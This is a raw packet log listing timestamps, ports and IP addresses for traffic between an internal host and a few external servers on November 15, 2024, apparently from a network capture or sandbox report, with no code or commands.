Nov 15, 2024 10:29:00.364651918 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364698887 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364712000 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364738941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364742994 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.364797115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364835024 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.364845037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364859104 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364870071 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364890099 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.365073919 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.365087032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.365098000 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.365144014 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.365144014 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.365178108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.365221977 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.365233898 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.365286112 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.365288973 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.365299940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.365341902 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.371999025 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.372020006 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.372033119 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.372086048 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.391382933 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391422987 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391433001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391439915 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391448975 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391459942 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391505003 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391515970 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391525984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391570091 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391581059 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.391606092 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.391645908 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391650915 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.391659021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391669035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391680956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391690016 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391720057 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.391720057 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.391737938 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.391891956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391933918 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391966105 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391976118 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.391987085 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.392148972 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392175913 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392185926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392215967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392225981 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.392225981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392225981 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.392262936 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.392453909 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392469883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392476082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392493010 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392508030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392522097 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392534971 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.392534971 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.392724037 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.392807961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392879009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392915010 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.392921925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392932892 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392956018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.392980099 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.393001080 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.393001080 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.393053055 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.393065929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.393090963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.393127918 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.393305063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.393306971 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.393316984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.393328905 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.393356085 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.393409014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.393456936 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.394346952 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.394362926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.394375086 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.394416094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.394417048 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.394465923 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.400289059 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.400326014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.400337934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.400350094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.400393963 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.400393963 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.400408983 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.400419950 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.400441885 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.400479078 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.452617884 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:24.935710907 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:24.940896988 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:24.941117048 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:25.042198896 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:25.047064066 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:25.047265053 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:25.105990887 CET	49928	443	192.168.2.10	172.67.74.152
Nov 15, 2024 10:29:25.106029987 CET	443	49928	172.67.74.152	192.168.2.10
Nov 15, 2024 10:29:25.106097937 CET	49928	443	192.168.2.10	172.67.74.152
Nov 15, 2024 10:29:25.149735928 CET	49928	443	192.168.2.10	172.67.74.152
Nov 15, 2024 10:29:25.149756908 CET	443	49928	172.67.74.152	192.168.2.10
Nov 15, 2024 10:29:25.756361961 CET	443	49928	172.67.74.152	192.168.2.10
Nov 15, 2024 10:29:25.756452084 CET	49928	443	192.168.2.10	172.67.74.152
Nov 15, 2024 10:29:26.133220911 CET	49928	443	192.168.2.10	172.67.74.152
Nov 15, 2024 10:29:26.133253098 CET	443	49928	172.67.74.152	192.168.2.10
Nov 15, 2024 10:29:26.133625984 CET	443	49928	172.67.74.152	192.168.2.10
Nov 15, 2024 10:29:26.133686066 CET	49928	443	192.168.2.10	172.67.74.152
Nov 15, 2024 10:29:26.134895086 CET	49928	443	192.168.2.10	172.67.74.152
Nov 15, 2024 10:29:26.175337076 CET	443	49928	172.67.74.152	192.168.2.10
Nov 15, 2024 10:29:26.312777042 CET	443	49928	172.67.74.152	192.168.2.10
Nov 15, 2024 10:29:26.312864065 CET	443	49928	172.67.74.152	192.168.2.10
Nov 15, 2024 10:29:26.312880039 CET	49928	443	192.168.2.10	172.67.74.152
Nov 15, 2024 10:29:26.312911987 CET	49928	443	192.168.2.10	172.67.74.152
Nov 15, 2024 10:29:26.313206911 CET	49928	443	192.168.2.10	172.67.74.152
Nov 15, 2024 10:29:26.313225031 CET	443	49928	172.67.74.152	192.168.2.10
Nov 15, 2024 10:29:30.224291086 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.229348898 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.229363918 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.229402065 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.229419947 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.229469061 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.229479074 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.229486942 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.229511976 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.229525089 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.229595900 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.229605913 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.229621887 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.229630947 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.229655981 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.229681969 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.234389067 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.234399080 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.234420061 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.234428883 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.234442949 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.234510899 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.234525919 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.234536886 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.234571934 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.234688997 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.234699965 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.234711885 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.234755039 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.234762907 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.234765053 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.234786034 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.234822989 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.239546061 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.239584923 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.239594936 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.239605904 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.239659071 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.239720106 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.239767075 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.239895105 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.239943981 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.240051985 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.240082979 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.240094900 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.240117073 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.240122080 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.240130901 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.240153074 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.240184069 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.240245104 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.240600109 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.240691900 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.240731955 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.240753889 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.240765095 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.240787029 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.240829945 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.240875959 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.240947962 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.240983009 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.241023064 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.241033077 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.241053104 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.241080999 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.241101980 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.241154909 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.244790077 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244801044 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244810104 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244820118 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244828939 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244848013 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244854927 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.244859934 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244868040 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244878054 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244880915 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.244885921 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244899035 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.244900942 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244910955 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244920015 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244929075 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244940042 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.244945049 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.244968891 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.244988918 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245013952 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245023966 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245032072 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245062113 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245071888 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245079041 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245098114 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245105982 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245120049 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245131969 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245141029 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245153904 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245176077 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245187044 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245219946 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245261908 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245296001 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245306969 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245362043 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245362043 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245371103 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245379925 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245388985 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245407104 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245415926 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245424986 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245424986 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245434999 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245459080 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245469093 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245470047 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245495081 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245522976 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245558977 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245568991 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245635986 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245701075 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245712042 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245723963 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245733976 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245759010 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245768070 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245770931 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245783091 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245817900 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245839119 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245848894 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245896101 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.245932102 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245942116 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245953083 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245970011 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.245995998 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.246017933 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.246028900 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246042013 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246084929 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.246400118 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246409893 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246417999 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246428013 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246438026 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246454954 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246457100 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.246463060 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246474028 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246483088 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246484041 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.246494055 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246498108 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.246505022 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246526003 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.246548891 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.246562004 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.246592045 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.246627092 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250159979 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250173092 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250181913 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250191927 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250210047 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250220060 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250231028 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250247955 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250247955 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250266075 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250271082 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250291109 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250303030 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250333071 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250381947 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250405073 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250461102 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250472069 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250483036 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250492096 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250508070 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250518084 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250526905 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250534058 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250575066 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250579119 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250586033 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250596046 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250612974 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250622988 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250641108 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250643969 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250644922 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250663996 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250664949 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250674009 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250684023 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250698090 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.250731945 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.250734091 CET	49927	15666	192.168.2.10	45.130.145.152
